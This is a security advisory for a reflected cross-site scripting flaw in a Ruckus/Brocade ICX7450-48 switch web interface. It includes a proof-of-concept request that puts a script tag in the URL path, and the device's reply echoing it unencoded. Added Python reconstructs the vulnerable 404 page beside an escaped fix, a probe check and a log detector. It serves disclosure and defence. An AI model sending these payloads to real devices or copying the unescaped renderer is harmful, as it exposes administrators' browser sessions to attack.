Packet Storm advisory PACKETSTORM:147901

Ruckus (Brocade) ICX7450-48 Reflected Cross Site Scripting

2018-05-25 00:00:00
Yavuz Atlas
packetstormsecurity.com

EPSS: 0.001 (percentile 50.9%)

```
I. VULNERABILITY
-------------------------
Ruckus (Brocade) ICX7450-48 Reflected Cross Site Scripting


II. CVE REFERENCE
-------------------------
CVE-2018-11027


III. VENDOR HOMEPAGE
-------------------------
https://www.ruckuswireless.com


IV. DESCRIPTION
-------------------------
The Ruckus (Brocade) ICX7450-48 web application has a reflected cross-site
scripting vulnerability: the requested URL path is echoed unencoded into the
"Object Not Found" error page, as the proof of concept below shows. A
successful exploit could allow the attacker to execute arbitrary script code
in the context of the affected site and to access sensitive browser-based
information.


V. PROOF OF CONCEPT
-------------------------
Request:

GET /<script>alert(1)</script> HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Response:

<html>
<head>
<title>Object Not Found</title>
</head>
<body>
<h1>Object Not Found</h1>
The requested URL '/<script>alert(1)</script>' was not found on the asdf_ICX.<p>
Return to <a href="">last page</a><p>
</body>
</html>


VI. CREDIT
-------------------------
Yavuz Atlas - @yavuzatlas_
http://www.biznet.com.tr
```

This message and its attachments are confidential and intended solely for the recipient(s) stated therein. This message cannot be copied, distributed or published for any purpose. If you are not the intended recipient, please do not copy, publish or forward the information existing in the content and attachments of this message. In such case please notify the sender immediately and delete all the copies of the message. Our company shall have no liability for any changes in or late receiving of the message, loss of integrity and confidentiality, viruses and any damages caused in any way to your computer system based on this message.
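The response above shows the classic shape of this bug: a 404 handler that interpolates the raw request path into an HTML body. The following Python is an added example, not firmware code from Ruckus/Brocade or code from the advisory author. It reconstructs that 404 renderer next to a hardened version that HTML-encodes the path, adds a regression check that uses a harmless probe tag (not `alert(1)`) to tell the two apart, and runs a simple detector over constructed access-log lines to flag request targets carrying angle brackets. `DEVICE_NAME` is copied from the advisory's response body; the probe string and log lines are constructed values.

```python
"""Reflected XSS in a 404 page: reconstruction, fix, and defender-side checks.

Added example; not Ruckus/Brocade firmware and not the advisory author's code.
The vulnerable renderer only reproduces the response shape shown in the advisory.
"""
import html
import re
from urllib.parse import unquote

DEVICE_NAME = "asdf_ICX"  # hostname string as it appears in the advisory's 404 body

_PAGE_HEAD = "<html>\n<head>\n<title>Object Not Found</title>\n</head>\n<body>\n<h1>Object Not Found</h1>\n"
_PAGE_TAIL = 'Return to <a href="">last page</a><p>\n</body>\n</html>\n'


def render_not_found_vulnerable(path: str) -> str:
    """Reconstruction of the observed behaviour: the requested path is placed
    into the HTML body without any encoding, so a path containing markup
    becomes live markup in the browser."""
    return _PAGE_HEAD + f"The requested URL '{path}' was not found on the {DEVICE_NAME}.<p>\n" + _PAGE_TAIL


def render_not_found_safe(path: str) -> str:
    """Hardened version: HTML-encode every value that lands in an HTML text
    context. The device name is encoded too, since it is also user-settable."""
    safe_path = html.escape(path, quote=True)
    safe_name = html.escape(DEVICE_NAME, quote=True)
    return _PAGE_HEAD + f"The requested URL '{safe_path}' was not found on the {safe_name}.<p>\n" + _PAGE_TAIL


# Harmless probe for a regression test or scanner: a unique tag name that no
# page legitimately contains. Constructed value, not from the advisory.
PROBE_PATH = "/<xssprobe-7f3a>"


def reflects_unescaped_markup(probe_path: str, body: str) -> bool:
    """True when the response echoes the probe's angle brackets back as raw
    markup. A correctly encoded page contains &lt;xssprobe-7f3a&gt; instead,
    so the decoded probe never appears verbatim."""
    return unquote(probe_path) in body


_ANGLE_BRACKET = re.compile(r"[<>]")


def is_suspicious_request_path(request_target: str) -> bool:
    """Detection helper: flag request targets that carry angle brackets, raw or
    percent-encoded (%3C / %3E). A legitimate path into the switch UI never
    needs them."""
    return bool(_ANGLE_BRACKET.search(unquote(request_target)))


# Constructed access-log lines (not from the advisory) to run the detector over.
SAMPLE_LOG = [
    '10.10.10.20 - - [25/May/2018:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.10.10.20 - - [25/May/2018:10:01:09 +0000] "GET /<script>alert(1)</script> HTTP/1.1" 404 236',
    '10.10.10.21 - - [25/May/2018:10:02:33 +0000] "GET /%3Cimg%20src=x%3E HTTP/1.1" 404 221',
]

_REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def flag_suspicious_log_lines(lines):
    """Return the log lines whose request target contains angle brackets."""
    flagged = []
    for line in lines:
        match = _REQUEST_LINE.search(line)
        if match and is_suspicious_request_path(match.group(1)):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    print("vulnerable reflects probe:", reflects_unescaped_markup(PROBE_PATH, render_not_found_vulnerable(PROBE_PATH)))
    print("hardened reflects probe:  ", reflects_unescaped_markup(PROBE_PATH, render_not_found_safe(PROBE_PATH)))
    for entry in flag_suspicious_log_lines(SAMPLE_LOG):
        print("flagged:", entry)
```

The fix is output encoding at the point where the path meets the HTML context; `html.escape` turns `<` into `&lt;`, so the browser renders the path as text instead of parsing it as a tag. The probe-based check is what a firmware regression test or an internal scanner would run against the 404 page after a patch, and the log detector gives the SOC side a cheap signal for attempts against an unpatched switch.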
